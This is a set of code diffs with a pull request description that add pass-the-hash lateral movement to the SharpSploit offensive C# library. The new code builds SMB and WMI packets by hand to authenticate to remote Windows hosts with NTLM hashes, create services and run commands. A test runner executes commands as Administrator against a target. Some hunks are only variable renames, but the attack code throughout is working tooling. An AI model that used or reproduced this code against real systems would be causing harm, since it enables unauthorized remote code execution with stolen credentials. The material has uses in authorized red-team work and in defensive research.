+                                                                WMI_Client_Stage_Next = "Request";
                                                             }
                                                         }
 
@@ -911,7 +911,7 @@ namespace SharpSploit.LateralMovement
                                             WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length);
                                             Thread.Sleep(10);
                                         }
-                                        WMI_client_stage = WMI_client_stage_next;
+                                        WMI_Client_Stage = WMI_Client_Stage_Next;
                                     }
                                     break;
                                 case "Result":
@@ -928,7 +928,7 @@ namespace SharpSploit.LateralMovement
                                             success = true;
                                         }
 
-                                        WMI_client_stage = "exit";
+                                        WMI_Client_Stage = "exit";
                                     }
                                     break;
                             }
@@ -1006,6 +1006,7 @@ namespace SharpSploit.LateralMovement
 
             return sb.ToString();
         }
+        
         /// <summary>
         /// Execute a command against multiple targets using Pass the Hash and SMB
         /// </summary>
@@ -1147,7 +1148,6 @@ namespace SharpSploit.LateralMovement
                                 if (BitConverter.ToString(new byte[] { SMBClientReceive[4], SMBClientReceive[5], SMBClientReceive[6], SMBClientReceive[7] }).ToLower() == "ff-53-4d-42")
                                 {
                                     ForceSMB1 = true;
-                                    //SMB_version = "SMB1";
                                     if (debug) { output.AppendLine("Using SMB1"); }
                                     SMBClientStage = "NTLMSSPNegotiate";
                                     if (BitConverter.ToString(new byte[] { SMBClientReceive[39] }).ToLower() == "0f")
@@ -1230,7 +1230,7 @@ namespace SharpSploit.LateralMovement
                                     Packet_SMB2_Header = new OrderedDictionary();
                                     SMB2_Message_ID += 1;
                                     Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
-                                    Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null); //need to see if Packet_version works? Maybe this is just left over?
+                                    Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
                                     SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                     NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
                                     Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Negotiate);
@@ -1260,7 +1260,6 @@ namespace SharpSploit.LateralMovement
                 string hash2 = "";
                 for (int i = 0; i < hash.Length - 1; i += 2) { hash2 += (hash.Substring(i, 2) + "-"); };
                 byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
-                //string[] hash_string_array = hash2.Split('-');
                 string Auth_Hostname = Environment.MachineName;
                 byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
                 byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
@@ -1414,26 +1413,26 @@ namespace SharpSploit.LateralMovement
                     }
 
                     byte[] SMB_named_pipe_UUID = { 0x81, 0xbb, 0x7a, 0x36, 0x44, 0x98, 0xf1, 0x35, 0xad, 0x32, 0x98, 0xf0, 0x38, 0x00, 0x10, 0x03 };
-                    byte[] SMB_Service_bytes;
+                    byte[] SMB_Service_Bytes;
                     string SMB_Service = null;
                     if (string.IsNullOrEmpty(ServiceName))
                     {
                         const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
                         var rand = new Random();
                         SMB_Service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
-                        SMB_Service_bytes = Encoding.Unicode.GetBytes(SMB_Service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                        SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                     }
                     else
                     {
                         SMB_Service = ServiceName;
-                        SMB_Service_bytes = Encoding.Unicode.GetBytes(SMB_Service);
+                        SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service);
                         if (Convert.ToBoolean(SMB_Service.Length % 2))
                         {
-                            SMB_Service_bytes = SMB_Service_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
+                            SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                         }
                         else
                         {
-                            SMB_Service_bytes = SMB_Service_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                            SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                         }
                     }
                     if (debug) { output.AppendLine(String.Format("Service Name is {0}", SMB_Service)); }
@@ -1613,7 +1612,7 @@ namespace SharpSploit.LateralMovement
                                             Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
 
-                                        Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_bytes, SMB_Service_Length);
+                                        Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
                                         SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
                                         Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
                                         RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
@@ -1644,7 +1643,7 @@ namespace SharpSploit.LateralMovement
                                             SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 88, 107);
                                             if (SMB_execute)
                                             {
-                                                Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
+                                                Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
                                                 SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
                                                 if (SCM_Data.Length < SMB_Split_Index)
                                                 {
@@ -1694,7 +1693,7 @@ namespace SharpSploit.LateralMovement
                                             Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
 
-                                        Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
+                                        Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
                                         SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
                                         Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
                                         RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
@@ -2231,7 +2230,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_bytes, SMB_Service_Length);
+                                        Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
                                         SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
                                         Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
                                         RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
@@ -2265,7 +2264,7 @@ namespace SharpSploit.LateralMovement
                                             SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 108, 127);
                                             if (SMB_execute)
                                             {
-                                                Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
+                                                Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
                                                 SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
                                                 if (SCM_Data.Length < SMB_Split_Index)
                                                 {

--- a/SharpSploit/Misc/Utilities.cs
+++ b/SharpSploit/Misc/Utilities.cs
@@ -85,20 +85,11 @@ namespace SharpSploit.Misc
         {
             get { return IntPtr.Size == 8; }
         }
-        public static byte[] CombineByteArray(byte[] a, byte[] b)
-        {
-            byte[] c = new byte[a.Length + b.Length];
-            Buffer.BlockCopy(a, 0, c, 0, a.Length);
-            Buffer.BlockCopy(b, 0, c, a.Length, b.Length);
-            return c;
-        }
 
         public static ushort DataLength(int length_start, byte[] string_extract_data)
         {
             byte[] bytes = { string_extract_data[length_start], string_extract_data[length_start + 1] };
             ushort string_length = BitConverter.ToUInt16(GetByteRange(string_extract_data, length_start, length_start + 1), 0);
-            //string_length = ConvertToUint16(array[arraystart to arraystart +1
-
             return string_length;
         }
         public static byte[] GetByteRange(byte[] array, int start, int end)

--- a/SharpSploit/Misc/Utilities.cs
+++ b/SharpSploit/Misc/Utilities.cs
@@ -3,6 +3,9 @@
 // License: BSD 3-Clause
 
 using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.Collections.Specialized;
 using System.IO;
 using System.IO.Compression;
 using System.Linq;
@@ -81,6 +84,49 @@ namespace SharpSploit.Misc
         public static bool Is64Bit
         {
             get { return IntPtr.Size == 8; }
+        }
+        public static byte[] CombineByteArray(byte[] a, byte[] b)
+        {
+            byte[] c = new byte[a.Length + b.Length];
+            Buffer.BlockCopy(a, 0, c, 0, a.Length);
+            Buffer.BlockCopy(b, 0, c, a.Length, b.Length);
+            return c;
+        }
+
+        public static ushort DataLength(int length_start, byte[] string_extract_data)
+        {
+            byte[] bytes = { string_extract_data[length_start], string_extract_data[length_start + 1] };
+            ushort string_length = BitConverter.ToUInt16(GetByteRange(string_extract_data, length_start, length_start + 1), 0);
+            //string_length = ConvertToUint16(array[arraystart to arraystart +1
+
+            return string_length;
+        }
+        public static byte[] GetByteRange(byte[] array, int start, int end)
+        {
+            var newArray = array.Skip(start).Take(end - start + 1).ToArray();
+            return newArray;
+        }
+
+        public static byte[] ConvertStringToByteArray(string hex)
+        {
+            return Enumerable.Range(0, hex.Length)
+                             .Where(x => x % 2 == 0)
+                             .Select(x => Convert.ToByte(hex.Substring(x, 2), 16))
+                             .ToArray();
+        }
+
+        public static byte[] ConvertFromPacketOrderedDictionary(OrderedDictionary packet_ordered_dictionary)
+        {
+            List<byte[]> byte_list = new List<byte[]>();
+            foreach (DictionaryEntry de in packet_ordered_dictionary)
+            {
+                byte_list.Add(de.Value as byte[]);
+            }
+
+            var flattenedList = byte_list.SelectMany(bytes => bytes);
+            byte[] byte_Array = flattenedList.ToArray();
+
+            return byte_Array;
         }
     }
 }

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1341,6 +1341,24 @@
             https://www.pinvoke.net/default.aspx/Enums/NtStatus.html
             </summary>
         </member>
+        <member name="M:SharpSploit.Execution.SMBExec.NetBIOSSessionService(System.Int32,System.Int32)">
+            <summary>
+            SMBExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
+            </summary>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
+            </remarks>
+        </member>
+        <member name="M:SharpSploit.Execution.WMIExec.RPCBind(System.Int32,System.Byte[],System.Byte[],System.Byte[],System.Byte[],System.Byte[])">
+            <summary>
+            WMIExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
+            </summary>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
+            </remarks>
+        </member>
         <member name="T:SharpSploit.Execution.PE">
             <summary>
             PE is a library for loading PEs in memory. It currently only work for the Mimikatz PE, not for arbitrary PEs.
@@ -1604,6 +1622,118 @@
             Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). This is
             a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available
             here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
+            </remarks>
+        </member>
+        <member name="M:SharpSploit.LateralMovement.PassTheHash.WMIAdminCheck(System.String,System.String,System.String,System.String)">
+            <summary>
+            Determines if a username and hash has administrative privilege on a target
+            </summary>
+            <param name="username">The Username to query.</param>
+            <param name="hash">The NTLM hash for the user</param>
+            <param name="domain">The logon domain for the user</param>
+            <param name="target">The target to query.</param>
+            <returns>True for Admin, False for not.</returns>
+            <author>Scottie Austin (@checkymander)</author>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
+            </remarks>
+        </member>
+        <member name="M:SharpSploit.LateralMovement.PassTheHash.WMIExecute(System.String,System.String,System.String,System.Collections.Generic.List{System.String},System.String,System.Int32,System.Boolean,System.Boolean)">
+            <summary>
+            Execute a command against multiple targets using Pass the Hash and WMI
+            </summary>
+            <param name="username">The username to log on as.</param>
+            <param name="hash">The NTLM hash for the user.</param>
+            <param name="domain">The logon domain for the user.</param>
+            <param name="targets">The target computers to run the command on.</param>
+            <param name="command">The Command to execute on the target</param>
+            <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+            <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+            <param name="debug">Include debug information in the output</param>
+            <returns>Returns a string containing execution results.</returns>
+            <author>Scottie Austin (@checkymander)</author>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
+            </remarks>
+        </member>
+        <member name="M:SharpSploit.LateralMovement.PassTheHash.WMIExecute(System.String,System.String,System.String,System.String,System.String,System.Int32,System.Boolean,System.Boolean)">
+            <summary>
+            Execute a command against a target using Pass the Hash and WMI
+            </summary>
+            <param name="username">The username to log on as.</param>
+            <param name="hash">The NTLM hash for the user.</param>
+            <param name="domain">The logon domain for the user.</param>
+            <param name="target">The target computers to run the command on.</param>
+            <param name="command">The Command to execute on the target.</param>
+            <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+            <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+            <param name="debug">Include debug information in the output.</param>
+            <returns>Returns a string containing execution results.</returns>
+            <author>Scottie Austin (@checkymander)</author>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
+            </remarks>
+        </member>
+        <member name="M:SharpSploit.LateralMovement.PassTheHash.SMBAdminCheck(System.String,System.String,System.String,System.String)">
+            <summary>
+            Determines if a username and hash has administrative privilege on a target
+            </summary>
+            <param name="username">The Username to query.</param>
+            <param name="hash">The NTLM hash for the user</param>
+            <param name="domain">The logon domain for the user</param>
+            <param name="target">The target to query.</param>
+            <returns>True for Admin, False for not.</returns>
+            <author>Scottie Austin (@checkymander)</author>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
+            </remarks>
+        </member>
+        <member name="M:SharpSploit.LateralMovement.PassTheHash.SMBExecute(System.String,System.String,System.String,System.Collections.Generic.List{System.String},System.String,System.Int32,System.String,System.Boolean,System.Boolean,System.Boolean,System.Boolean)">
+            <summary>
+            Execute a command against multiple targets using Pass the Hash and SMB
+            </summary>
+            <param name="username">The username to log on as.</param>
+            <param name="hash">The NTLM hash for the user.</param>
+            <param name="domain">The logon domain for the user.</param>
+            <param name="targets">The target computers to run the command on.</param>
+            <param name="command">The Command to execute on the target</param>
+            <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+            <param name="ServiceName">The name to give the SMB service for execution.</param>
+            <param name="AdminCheck">Check only if user is Admin on targets.</param>
+            <param name="ComSpec">Append %COMSPEC% /C to command. (default=true)</param>
+            <param name="ForceSMB1">Force usage of SMBv1.</param>
+            <param name="debug">Include debug information in the output.</param>
+            <returns>Returns a string containing execution results.</returns>
+            <author>Scottie Austin (@checkymander)</author>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
+            </remarks>
+        </member>
+        <member name="M:SharpSploit.LateralMovement.PassTheHash.SMBExecute(System.String,System.String,System.String,System.String,System.String,System.Int32,System.String,System.Boolean,System.Boolean,System.Boolean,System.Boolean)">
+            <summary>
+            Execute a command against multiple targets using Pass the Hash and SMB
+            </summary>
+            <param name="username">The username to log on as.</param>
+            <param name="hash">The NTLM hash for the user.</param>
+            <param name="domain">The logon domain for the user.</param>
+            <param name="target">The target computer to run the command on.</param>
+            <param name="command">The Command to execute on the target</param>
+            <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+            <param name="ServiceName">The name to give the SMB service for execution.</param>
+            <param name="AdminCheck">Check only if user is Admin on targets.</param>
+            <param name="ComSpec">Append %COMSPEC% /C to command. (default=true)</param>
+            <param name="ForceSMB1">Force usage of SMBv1.</param>
+            <param name="debug">Include debug information in the output.</param>
+            <returns>Returns a string containing execution results.</returns>
+            <author>Scottie Austin (@checkymander)</author>
+            <remarks>
+            Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+            at https://github.com/Kevin-Robertson/Invoke-TheHash)
             </remarks>
         </member>
         <member name="T:SharpSploit.LateralMovement.PowerShellRemoting">

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1626,12 +1626,12 @@
         </member>
         <member name="M:SharpSploit.LateralMovement.PassTheHash.WMIAdminCheck(System.String,System.String,System.String,System.String)">
             <summary>
-            Determines if a username and hash has administrative privilege on a target
+            Determines if a username and hash has administrative privilege on a Target
             </summary>
             <param name="username">The Username to query.</param>
             <param name="hash">The NTLM hash for the user</param>
             <param name="domain">The logon domain for the user</param>
-            <param name="target">The target to query.</param>
+            <param name="Target">The Target to query.</param>
             <returns>True for Admin, False for not.</returns>
             <author>Scottie Austin (@checkymander)</author>
             <remarks>
@@ -1646,10 +1646,10 @@
             <param name="username">The username to log on as.</param>
             <param name="hash">The NTLM hash for the user.</param>
             <param name="domain">The logon domain for the user.</param>
-            <param name="targets">The target computers to run the command on.</param>
-            <param name="command">The Command to execute on the target</param>
+            <param name="targets">The Target computers to run the command on.</param>
+            <param name="command">The Command to execute on the Target</param>
             <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
-            <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+            <param name="AdminCheck">Check if user is an Admin on the Target only.</param>
             <param name="debug">Include debug information in the output</param>
             <returns>Returns a string containing execution results.</returns>
             <author>Scottie Austin (@checkymander)</author>
@@ -1660,15 +1660,15 @@
         </member>
         <member name="M:SharpSploit.LateralMovement.PassTheHash.WMIExecute(System.String,System.String,System.String,System.String,System.String,System.Int32,System.Boolean,System.Boolean)">
             <summary>
-            Execute a command against a target using Pass the Hash and WMI
+            Execute a command against a Target using Pass the Hash and WMI
             </summary>
             <param name="username">The username to log on as.</param>
             <param name="hash">The NTLM hash for the user.</param>
             <param name="domain">The logon domain for the user.</param>
-            <param name="target">The target computers to run the command on.</param>
-            <param name="command">The Command to execute on the target.</param>
+            <param name="Target">The Target computers to run the command on.</param>
+            <param name="command">The Command to execute on the Target.</param>
             <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
-            <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+            <param name="AdminCheck">Check if user is an Admin on the Target only.</param>
             <param name="debug">Include debug information in the output.</param>
             <returns>Returns a string containing execution results.</returns>
             <author>Scottie Austin (@checkymander)</author>
@@ -1679,12 +1679,12 @@
         </member>
         <member name="M:SharpSploit.LateralMovement.PassTheHash.SMBAdminCheck(System.String,System.String,System.String,System.String)">
             <summary>
-            Determines if a username and hash has administrative privilege on a target
+            Determines if a username and hash has administrative privilege on a Target
             </summary>
             <param name="username">The Username to query.</param>
             <param name="hash">The NTLM hash for the user</param>
             <param name="domain">The logon domain for the user</param>
-            <param name="target">The target to query.</param>
+            <param name="Target">The Target to query.</param>
             <returns>True for Admin, False for not.</returns>
             <author>Scottie Austin (@checkymander)</author>
             <remarks>
@@ -1699,8 +1699,8 @@
             <param name="username">The username to log on as.</param>
             <param name="hash">The NTLM hash for the user.</param>
             <param name="domain">The logon domain for the user.</param>
-            <param name="targets">The target computers to run the command on.</param>
-            <param name="command">The Command to execute on the target</param>
+            <param name="targets">The Target computers to run the command on.</param>
+            <param name="command">The Command to execute on the Target</param>
             <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
             <param name="ServiceName">The name to give the SMB service for execution.</param>
             <param name="AdminCheck">Check only if user is Admin on targets.</param>
@@ -1721,8 +1721,8 @@
             <param name="username">The username to log on as.</param>
             <param name="hash">The NTLM hash for the user.</param>
             <param name="domain">The logon domain for the user.</param>
-            <param name="target">The target computer to run the command on.</param>
-            <param name="command">The Command to execute on the target</param>
+            <param name="Target">The Target computer to run the command on.</param>
+            <param name="command">The Command to execute on the Target</param>
             <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
             <param name="ServiceName">The name to give the SMB service for execution.</param>
             <param name="AdminCheck">Check only if user is Admin on targets.</param>


### PR DESCRIPTION
Added pass the hash functionality into SharpSploit, WMIExecute and SMBExecute based on the Invoke-TheHash codebase. Code can be tested with the following runner:

```
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(PassTheHash.WMIExecute("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false)); ;


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>")); ;

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}
```

The library supports both Admin Check functionality, and command execution with support for WMI, SMB1, and SMB2 (including signing).